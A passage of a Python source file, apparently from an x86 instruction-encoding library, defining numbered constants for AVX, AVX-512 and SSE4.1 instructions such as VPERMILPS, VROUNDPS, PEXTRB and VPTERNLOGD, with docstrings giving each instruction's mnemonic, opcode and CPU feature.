VEX_VPERMILPS_YMM_YMMM256_IMM8: int = 3729
"""
``VPERMILPS ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W0 04 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPS_XMM_K1Z_XMMM128B32_IMM8: int = 3730
"""
``VPERMILPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 04 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_YMM_K1Z_YMMM256B32_IMM8: int = 3731
"""
``VPERMILPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 04 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_ZMM_K1Z_ZMMM512B32_IMM8: int = 3732
"""
``VPERMILPS zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 04 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPD_XMM_XMMM128_IMM8: int = 3733
"""
``VPERMILPD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 05 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPD_YMM_YMMM256_IMM8: int = 3734
"""
``VPERMILPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W0 05 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPD_XMM_K1Z_XMMM128B64_IMM8: int = 3735
"""
``VPERMILPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 05 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_YMM_K1Z_YMMM256B64_IMM8: int = 3736
"""
``VPERMILPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 05 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3737
"""
``VPERMILPD zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 05 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERM2F128_YMM_YMM_YMMM256_IMM8: int = 3738
"""
``VPERM2F128 ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 06 /r ib``
``AVX``
``16/32/64-bit``
"""
ROUNDPS_XMM_XMMM128_IMM8: int = 3739
"""
``ROUNDPS xmm1, xmm2/m128, imm8``
``66 0F 3A 08 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDPS_XMM_XMMM128_IMM8: int = 3740
"""
``VROUNDPS xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 08 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VROUNDPS_YMM_YMMM256_IMM8: int = 3741
"""
``VROUNDPS ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.WIG 08 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3742
"""
``VRNDSCALEPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 08 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3743
"""
``VRNDSCALEPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 08 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3744
"""
``VRNDSCALEPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 08 /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDPD_XMM_XMMM128_IMM8: int = 3745
"""
``ROUNDPD xmm1, xmm2/m128, imm8``
``66 0F 3A 09 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDPD_XMM_XMMM128_IMM8: int = 3746
"""
``VROUNDPD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 09 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VROUNDPD_YMM_YMMM256_IMM8: int = 3747
"""
``VROUNDPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.WIG 09 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3748
"""
``VRNDSCALEPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 09 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3749
"""
``VRNDSCALEPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 09 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3750
"""
``VRNDSCALEPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 09 /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDSS_XMM_XMMM32_IMM8: int = 3751
"""
``ROUNDSS xmm1, xmm2/m32, imm8``
``66 0F 3A 0A /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDSS_XMM_XMM_XMMM32_IMM8: int = 3752
"""
``VROUNDSS xmm1, xmm2, xmm3/m32, imm8``
``VEX.LIG.66.0F3A.WIG 0A /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3753
"""
``VRNDSCALESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 0A /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDSD_XMM_XMMM64_IMM8: int = 3754
"""
``ROUNDSD xmm1, xmm2/m64, imm8``
``66 0F 3A 0B /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDSD_XMM_XMM_XMMM64_IMM8: int = 3755
"""
``VROUNDSD xmm1, xmm2, xmm3/m64, imm8``
``VEX.LIG.66.0F3A.WIG 0B /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3756
"""
``VRNDSCALESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 0B /r ib``
``AVX512F``
``16/32/64-bit``
"""
BLENDPS_XMM_XMMM128_IMM8: int = 3757
"""
``BLENDPS xmm1, xmm2/m128, imm8``
``66 0F 3A 0C /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VBLENDPS_XMM_XMM_XMMM128_IMM8: int = 3758
"""
``VBLENDPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0C /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDPS_YMM_YMM_YMMM256_IMM8: int = 3759
"""
``VBLENDPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0C /r ib``
``AVX``
``16/32/64-bit``
"""
BLENDPD_XMM_XMMM128_IMM8: int = 3760
"""
``BLENDPD xmm1, xmm2/m128, imm8``
``66 0F 3A 0D /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VBLENDPD_XMM_XMM_XMMM128_IMM8: int = 3761
"""
``VBLENDPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0D /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDPD_YMM_YMM_YMMM256_IMM8: int = 3762
"""
``VBLENDPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0D /r ib``
``AVX``
``16/32/64-bit``
"""
PBLENDW_XMM_XMMM128_IMM8: int = 3763
"""
``PBLENDW xmm1, xmm2/m128, imm8``
``66 0F 3A 0E /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPBLENDW_XMM_XMM_XMMM128_IMM8: int = 3764
"""
``VPBLENDW xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0E /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDW_YMM_YMM_YMMM256_IMM8: int = 3765
"""
``VPBLENDW ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0E /r ib``
``AVX2``
``16/32/64-bit``
"""
PALIGNR_MM_MMM64_IMM8: int = 3766
"""
``PALIGNR mm1, mm2/m64, imm8``
``NP 0F 3A 0F /r ib``
``SSSE3``
``16/32/64-bit``
"""
PALIGNR_XMM_XMMM128_IMM8: int = 3767
"""
``PALIGNR xmm1, xmm2/m128, imm8``
``66 0F 3A 0F /r ib``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPALIGNR_XMM_XMM_XMMM128_IMM8: int = 3768
"""
``VPALIGNR xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0F /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPALIGNR_YMM_YMM_YMMM256_IMM8: int = 3769
"""
``VPALIGNR ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0F /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPALIGNR_XMM_K1Z_XMM_XMMM128_IMM8: int = 3770
"""
``VPALIGNR xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.WIG 0F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPALIGNR_YMM_K1Z_YMM_YMMM256_IMM8: int = 3771
"""
``VPALIGNR ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.WIG 0F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPALIGNR_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3772
"""
``VPALIGNR zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.WIG 0F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
PEXTRB_R32M8_XMM_IMM8: int = 3773
"""
``PEXTRB r32/m8, xmm2, imm8``
``66 0F 3A 14 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRB_R64M8_XMM_IMM8: int = 3774
"""
``PEXTRB r64/m8, xmm2, imm8``
``66 o64 0F 3A 14 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRB_R32M8_XMM_IMM8: int = 3775
"""
``VPEXTRB r32/m8, xmm2, imm8``
``VEX.128.66.0F3A.W0 14 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRB_R64M8_XMM_IMM8: int = 3776
"""
``VPEXTRB r64/m8, xmm2, imm8``
``VEX.128.66.0F3A.W1 14 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRB_R32M8_XMM_IMM8: int = 3777
"""
``VPEXTRB r32/m8, xmm2, imm8``
``EVEX.128.66.0F3A.W0 14 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRB_R64M8_XMM_IMM8: int = 3778
"""
``VPEXTRB r64/m8, xmm2, imm8``
``EVEX.128.66.0F3A.W1 14 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRW_R32M16_XMM_IMM8: int = 3779
"""
``PEXTRW r32/m16, xmm, imm8``
``66 0F 3A 15 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRW_R64M16_XMM_IMM8: int = 3780
"""
``PEXTRW r64/m16, xmm, imm8``
``66 o64 0F 3A 15 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRW_R32M16_XMM_IMM8: int = 3781
"""
``VPEXTRW r32/m16, xmm2, imm8``
``VEX.128.66.0F3A.W0 15 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRW_R64M16_XMM_IMM8: int = 3782
"""
``VPEXTRW r64/m16, xmm2, imm8``
``VEX.128.66.0F3A.W1 15 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRW_R32M16_XMM_IMM8: int = 3783
"""
``VPEXTRW r32/m16, xmm2, imm8``
``EVEX.128.66.0F3A.W0 15 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRW_R64M16_XMM_IMM8: int = 3784
"""
``VPEXTRW r64/m16, xmm2, imm8``
``EVEX.128.66.0F3A.W1 15 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRD_RM32_XMM_IMM8: int = 3785
"""
``PEXTRD r/m32, xmm2, imm8``
``66 0F 3A 16 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRQ_RM64_XMM_IMM8: int = 3786
"""
``PEXTRQ r/m64, xmm2, imm8``
``66 o64 0F 3A 16 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRD_RM32_XMM_IMM8: int = 3787
"""
``VPEXTRD r/m32, xmm2, imm8``
``VEX.128.66.0F3A.W0 16 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRQ_RM64_XMM_IMM8: int = 3788
"""
``VPEXTRQ r/m64, xmm2, imm8``
``VEX.128.66.0F3A.W1 16 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRD_RM32_XMM_IMM8: int = 3789
"""
``VPEXTRD r/m32, xmm2, imm8``
``EVEX.128.66.0F3A.W0 16 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPEXTRQ_RM64_XMM_IMM8: int = 3790
"""
``VPEXTRQ r/m64, xmm2, imm8``
``EVEX.128.66.0F3A.W1 16 /r ib``
``AVX512DQ``
``64-bit``
"""
EXTRACTPS_RM32_XMM_IMM8: int = 3791
"""
``EXTRACTPS r/m32, xmm1, imm8``
``66 0F 3A 17 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
EXTRACTPS_R64M32_XMM_IMM8: int = 3792
"""
``EXTRACTPS r64/m32, xmm1, imm8``
``66 o64 0F 3A 17 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3793
"""
``VEXTRACTPS r/m32, xmm1, imm8``
``VEX.128.66.0F3A.W0 17 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3794
"""
``VEXTRACTPS r64/m32, xmm1, imm8``
``VEX.128.66.0F3A.W1 17 /r ib``
``AVX``
``64-bit``
"""
EVEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3795
"""
``VEXTRACTPS r/m32, xmm1, imm8``
``EVEX.128.66.0F3A.W0 17 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3796
"""
``VEXTRACTPS r64/m32, xmm1, imm8``
``EVEX.128.66.0F3A.W1 17 /r ib``
``AVX512F``
``64-bit``
"""
VEX_VINSERTF128_YMM_YMM_XMMM128_IMM8: int = 3797
"""
``VINSERTF128 ymm1, ymm2, xmm3/m128, imm8``
``VEX.256.66.0F3A.W0 18 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VINSERTF32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3798
"""
``VINSERTF32X4 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W0 18 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTF32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3799
"""
``VINSERTF32X4 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W0 18 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTF64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3800
"""
``VINSERTF64X2 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W1 18 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3801
"""
``VINSERTF64X2 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W1 18 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VEXTRACTF128_XMMM128_YMM_IMM8: int = 3802
"""
``VEXTRACTF128 xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 19 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X4_XMMM128_K1Z_YMM_IMM8: int = 3803
"""
``VEXTRACTF32X4 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 19 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X4_XMMM128_K1Z_ZMM_IMM8: int = 3804
"""
``VEXTRACTF32X4 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 19 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X2_XMMM128_K1Z_YMM_IMM8: int = 3805
"""
``VEXTRACTF64X2 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W1 19 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X2_XMMM128_K1Z_ZMM_IMM8: int = 3806
"""
``VEXTRACTF64X2 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 19 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3807
"""
``VINSERTF32X8 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W0 1A /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3808
"""
``VINSERTF64X4 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W1 1A /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X8_YMMM256_K1Z_ZMM_IMM8: int = 3809
"""
``VEXTRACTF32X8 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 1B /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X4_YMMM256_K1Z_ZMM_IMM8: int = 3810
"""
``VEXTRACTF64X4 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 1B /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VCVTPS2PH_XMMM64_XMM_IMM8: int = 3811
"""
``VCVTPS2PH xmm1/m64, xmm2, imm8``
``VEX.128.66.0F3A.W0 1D /r ib``
``F16C``
``16/32/64-bit``
"""
VEX_VCVTPS2PH_XMMM128_YMM_IMM8: int = 3812
"""
``VCVTPS2PH xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 1D /r ib``
``F16C``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_XMMM64_K1Z_XMM_IMM8: int = 3813
"""
``VCVTPS2PH xmm1/m64 {k1}{z}, xmm2, imm8``
``EVEX.128.66.0F3A.W0 1D /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_XMMM128_K1Z_YMM_IMM8: int = 3814
"""
``VCVTPS2PH xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 1D /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_YMMM256_K1Z_ZMM_IMM8_SAE: int = 3815
"""
``VCVTPS2PH ymm1/m256 {k1}{z}, zmm2{sae}, imm8``
``EVEX.512.66.0F3A.W0 1D /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_XMM_XMMM128B32_IMM8: int = 3816
"""
``VPCMPUD k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_YMM_YMMM256B32_IMM8: int = 3817
"""
``VPCMPUD k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3818
"""
``VPCMPUD k1 {k2}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 1E /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3819
"""
``VPCMPUQ k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3820
"""
``VPCMPUQ k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3821
"""
``VPCMPUQ k1 {k2}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 1E /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_XMM_XMMM128B32_IMM8: int = 3822
"""
``VPCMPD k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_YMM_YMMM256B32_IMM8: int = 3823
"""
``VPCMPD k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3824
"""
``VPCMPD k1 {k2}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 1F /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3825
"""
``VPCMPQ k1 {k2}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3826
"""
``VPCMPQ k1 {k2}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 1F /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3827
"""
``VPCMPQ k1 {k2}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 1F /r ib``
``AVX512F``
``16/32/64-bit``
"""
PINSRB_XMM_R32M8_IMM8: int = 3828
"""
``PINSRB xmm1, r32/m8, imm8``
``66 0F 3A 20 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PINSRB_XMM_R64M8_IMM8: int = 3829
"""
``PINSRB xmm1, r64/m8, imm8``
``66 o64 0F 3A 20 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3830
"""
``VPINSRB xmm1, xmm2, r32/m8, imm8``
``VEX.128.66.0F3A.W0 20 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3831
"""
``VPINSRB xmm1, xmm2, r64/m8, imm8``
``VEX.128.66.0F3A.W1 20 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3832
"""
``VPINSRB xmm1, xmm2, r32/m8, imm8``
``EVEX.128.66.0F3A.W0 20 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3833
"""
``VPINSRB xmm1, xmm2, r64/m8, imm8``
``EVEX.128.66.0F3A.W1 20 /r ib``
``AVX512BW``
``64-bit``
"""
INSERTPS_XMM_XMMM32_IMM8: int = 3834
"""
``INSERTPS xmm1, xmm2/m32, imm8``
``66 0F 3A 21 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3835
"""
``VINSERTPS xmm1, xmm2, xmm3/m32, imm8``
``VEX.128.66.0F3A.WIG 21 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3836
"""
``VINSERTPS xmm1, xmm2, xmm3/m32, imm8``
``EVEX.128.66.0F3A.W0 21 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PINSRD_XMM_RM32_IMM8: int = 3837
"""
``PINSRD xmm1, r/m32, imm8``
``66 0F 3A 22 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PINSRQ_XMM_RM64_IMM8: int = 3838
"""
``PINSRQ xmm1, r/m64, imm8``
``66 o64 0F 3A 22 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3839
"""
``VPINSRD xmm1, xmm2, r/m32, imm8``
``VEX.128.66.0F3A.W0 22 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3840
"""
``VPINSRQ xmm1, xmm2, r/m64, imm8``
``VEX.128.66.0F3A.W1 22 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3841
"""
``VPINSRD xmm1, xmm2, r/m32, imm8``
``EVEX.128.66.0F3A.W0 22 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3842
"""
``VPINSRQ xmm1, xmm2, r/m64, imm8``
``EVEX.128.66.0F3A.W1 22 /r ib``
``AVX512DQ``
``64-bit``
"""
EVEX_VSHUFF32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3843
"""
``VSHUFF32X4 ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 23 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3844
"""
``VSHUFF32X4 zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 23 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3845
"""
``VSHUFF64X2 ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 23 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFF64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3846
"""
``VSHUFF64X2 zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 23 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3847
"""
``VPTERNLOGD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3848
"""
``VPTERNLOGD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3849
"""
``VPTERNLOGD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 25 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3850
"""
``VPTERNLOGQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3851
"""
``VPTERNLOGQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 25 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTERNLOGQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3852
"""
``VPTERNLOGQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
